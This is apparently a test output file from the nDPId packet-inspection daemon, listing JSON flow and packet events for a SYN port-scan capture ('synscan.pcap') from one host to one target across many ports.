+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":836,"source":"synscan.pcap","alias":"nDPId-test","flow_id":827,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059785,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32782,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":836,"source":"synscan.pcap","alias":"nDPId-test","flow_id":827,"flow_packet_id":1,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059785,"pkt":"ACYLMQczACWzv5HuCABFAAAsHIEAADgG8\/GsEAAIQA2GNIzTgA7dU4MZAAAAAGACBAC0fQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":837,"source":"synscan.pcap","alias":"nDPId-test","flow_id":828,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059785,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5922,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":837,"source":"synscan.pcap","alias":"nDPId-test","flow_id":828,"flow_packet_id":1,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059785,"pkt":"ACYLMQczACWzv5HuCABFAAAsJwwAACUG\/GasEAAIQA2GNIzTFyLdU4MZAAAAAGACCAAZagAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":838,"source":"synscan.pcap","alias":"nDPId-test","flow_id":829,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059785,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1085,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":838,"source":"synscan.pcap","alias":"nDPId-test","flow_id":829,"flow_packet_id":1,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059785,"pkt":"ACYLMQczACWzv5HuCABFAAAswSYAADIGVUysEAAIQA2GNIzTBD3dU4MZAAAAAGACDAAoTwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":839,"source":"synscan.pcap","alias":"nDPId-test","flow_id":830,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059785,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":839,"source":"synscan.pcap","alias":"nDPId-test","flow_id":830,"flow_packet_id":1,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059785,"pkt":"ACYLMQczACWzv5HuCABFAAAsuoMAADkGVO+sEAAIQA2GNIzTwAvdU4MZAAAAAGACCABwgAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":840,"source":"synscan.pcap","alias":"nDPId-test","flow_id":831,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059785,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":12265,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":840,"source":"synscan.pcap","alias":"nDPId-test","flow_id":831,"flow_packet_id":1,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059785,"pkt":"ACYLMQczACWzv5HuCABFAAAsqtgAACcGdpqsEAAIQA2GNIzTL+ndU4MZAAAAAGACEAD4ogAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":841,"source":"synscan.pcap","alias":"nDPId-test","flow_id":832,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059785,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4125,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":841,"source":"synscan.pcap","alias":"nDPId-test","flow_id":832,"flow_packet_id":1,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059785,"pkt":"ACYLMQczACWzv5HuCABFAAAsnj0AACkGgTWsEAAIQA2GNIzTEB3dU4MZAAAAAGACCAAgbwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":842,"source":"synscan.pcap","alias":"nDPId-test","flow_id":833,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059785,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":842,"source":"synscan.pcap","alias":"nDPId-test","flow_id":833,"flow_packet_id":1,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059785,"pkt":"ACYLMQczACWzv5HuCABFAAAsjVUAACoGkR2sEAAIQA2GNIzTB8\/dU4MZAAAAAGACDAAkvQAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":843,"source":"synscan.pcap","alias":"nDPId-test","flow_id":834,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059785,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":109,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":843,"source":"synscan.pcap","alias":"nDPId-test","flow_id":834,"flow_packet_id":1,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059785,"pkt":"ACYLMQczACWzv5HuCABFAAAsshUAADkGXV2sEAAIQA2GNIzTAG3dU4MZAAAAAGACCAAwHwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":844,"source":"synscan.pcap","alias":"nDPId-test","flow_id":835,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059785,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5280,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":844,"source":"synscan.pcap","alias":"nDPId-test","flow_id":835,"flow_packet_id":1,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059785,"pkt":"ACYLMQczACWzv5HuCABFAAAs6SIAADMGLFCsEAAIQA2GNIzSFKDdUoMYAAAAAGACEAAT7wAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":845,"source":"synscan.pcap","alias":"nDPId-test","flow_id":836,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059785,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1066,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":845,"source":"synscan.pcap","alias":"nDPId-test","flow_id":836,"flow_packet_id":1,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059785,"pkt":"ACYLMQczACWzv5HuCABFAAAscgsAACUGsWesEAAIQA2GNIzSBCrdUoMYAAAAAGACCAAsZQAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":846,"source":"synscan.pcap","alias":"nDPId-test","flow_id":837,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059785,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":481,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":846,"source":"synscan.pcap","alias":"nDPId-test","flow_id":837,"flow_packet_id":1,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059785,"pkt":"ACYLMQczACWzv5HuCABFAAAsat0AADsGopWsEAAIQA2GNIzSAeHdUoMYAAAAAGACEAAmrgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":847,"source":"synscan.pcap","alias":"nDPId-test","flow_id":838,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059786,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5901,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":847,"source":"synscan.pcap","alias":"nDPId-test","flow_id":838,"flow_packet_id":1,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059786,"pkt":"ACYLMQczACWzv5HuCABFAAAsU+kAACgGzImsEAAIQA2GNIzSFw3dUoMYAAAAAGACBAAdggAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":848,"source":"synscan.pcap","alias":"nDPId-test","flow_id":839,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059786,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":848,"source":"synscan.pcap","alias":"nDPId-test","flow_id":839,"flow_packet_id":1,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059786,"pkt":"ACYLMQczACWzv5HuCABFAAAsfg8AADcGk2OsEAAIQA2GNIzSH2rdUoMYAAAAAGACEAAJJQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":849,"source":"synscan.pcap","alias":"nDPId-test","flow_id":840,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059786,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2967,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":849,"source":"synscan.pcap","alias":"nDPId-test","flow_id":840,"flow_packet_id":1,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059786,"pkt":"ACYLMQczACWzv5HuCABFAAAsRK4AADsGyMSsEAAIQA2GNIzSC5fdUoMYAAAAAGACEAAc+AAAAgQFtA=="} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":850,"source":"synscan.pcap","alias":"nDPId-test","flow_id":841,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059786,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":850,"source":"synscan.pcap","alias":"nDPId-test","flow_id":841,"flow_packet_id":1,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059786,"pkt":"ACYLMQczACWzv5HuCABFAAAsOd4AADMG25SsEAAIQA2GNIzSAATdUoMYAAAAAGACEAAoiwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":851,"source":"synscan.pcap","alias":"nDPId-test","flow_id":842,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059786,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1082,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":851,"source":"synscan.pcap","alias":"nDPId-test","flow_id":842,"flow_packet_id":1,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059786,"pkt":"ACYLMQczACWzv5HuCABFAAAsgJQAADUGkt6sEAAIQA2GNIzSBDrdUoMYAAAAAGACCAAsVQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":852,"source":"synscan.pcap","alias":"nDPId-test","flow_id":843,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059786,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1521,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":852,"source":"synscan.pcap","alias":"nDPId-test","flow_id":843,"flow_packet_id":1,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059786,"pkt":"ACYLMQczACWzv5HuCABFAAAsftgAACcGopqsEAAIQA2GNIzSBfHdUoMYAAAAAGACEAAingAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":853,"source":"synscan.pcap","alias":"nDPId-test","flow_id":844,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059786,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":853,"source":"synscan.pcap","alias":"nDPId-test","flow_id":844,"flow_packet_id":1,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059786,"pkt":"ACYLMQczACWzv5HuCABFAAAsN+EAACYG6pGsEAAIQA2GNIzSCDTdUoMYAAAAAGACDAAkWwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":854,"source":"synscan.pcap","alias":"nDPId-test","flow_id":845,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059786,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":854,"source":"synscan.pcap","alias":"nDPId-test","flow_id":845,"flow_packet_id":1,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059786,"pkt":"ACYLMQczACWzv5HuCABFAAAsqgcAADcGZ2usEAAIQA2GNIzSA+ndUoMYAAAAAGACEAAkpgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":855,"source":"synscan.pcap","alias":"nDPId-test","flow_id":846,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059786,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8090,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":855,"source":"synscan.pcap","alias":"nDPId-test","flow_id":846,"flow_packet_id":1,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059786,"pkt":"ACYLMQczACWzv5HuCABFAAAsDusAACwGDYisEAAIQA2GNIzSH5rdUoMYAAAAAGACBAAU9QAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":856,"source":"synscan.pcap","alias":"nDPId-test","flow_id":847,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059786,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1914,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":856,"source":"synscan.pcap","alias":"nDPId-test","flow_id":847,"flow_packet_id":1,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059786,"pkt":"ACYLMQczACWzv5HuCABFAAAsCKQAADQGC8+sEAAIQA2GNIzSB3rdUoMYAAAAAGACBAAtFQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":857,"source":"synscan.pcap","alias":"nDPId-test","flow_id":848,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059786,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7937,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":857,"source":"synscan.pcap","alias":"nDPId-test","flow_id":848,"flow_packet_id":1,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059786,"pkt":"ACYLMQczACWzv5HuCABFAAAsNx4AACgG6VSsEAAIQA2GNIzSHwHdUoMYAAAAAGACBAAVjgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":858,"source":"synscan.pcap","alias":"nDPId-test","flow_id":849,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":858,"source":"synscan.pcap","alias":"nDPId-test","flow_id":849,"flow_packet_id":1,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059845,"pkt":"ACYLMQczACWzv5HuCABFAAAsdyIAADIGn1CsEAAIQA2GNIzTC77dU4MZAAAAAGACDAAgzgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":859,"source":"synscan.pcap","alias":"nDPId-test","flow_id":850,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3168,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":859,"source":"synscan.pcap","alias":"nDPId-test","flow_id":850,"flow_packet_id":1,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059845,"pkt":"ACYLMQczACWzv5HuCABFAAAsqZ8AADkGZdOsEAAIQA2GNIzTDGDdU4MZAAAAAGACCAAkLAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":860,"source":"synscan.pcap","alias":"nDPId-test","flow_id":851,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 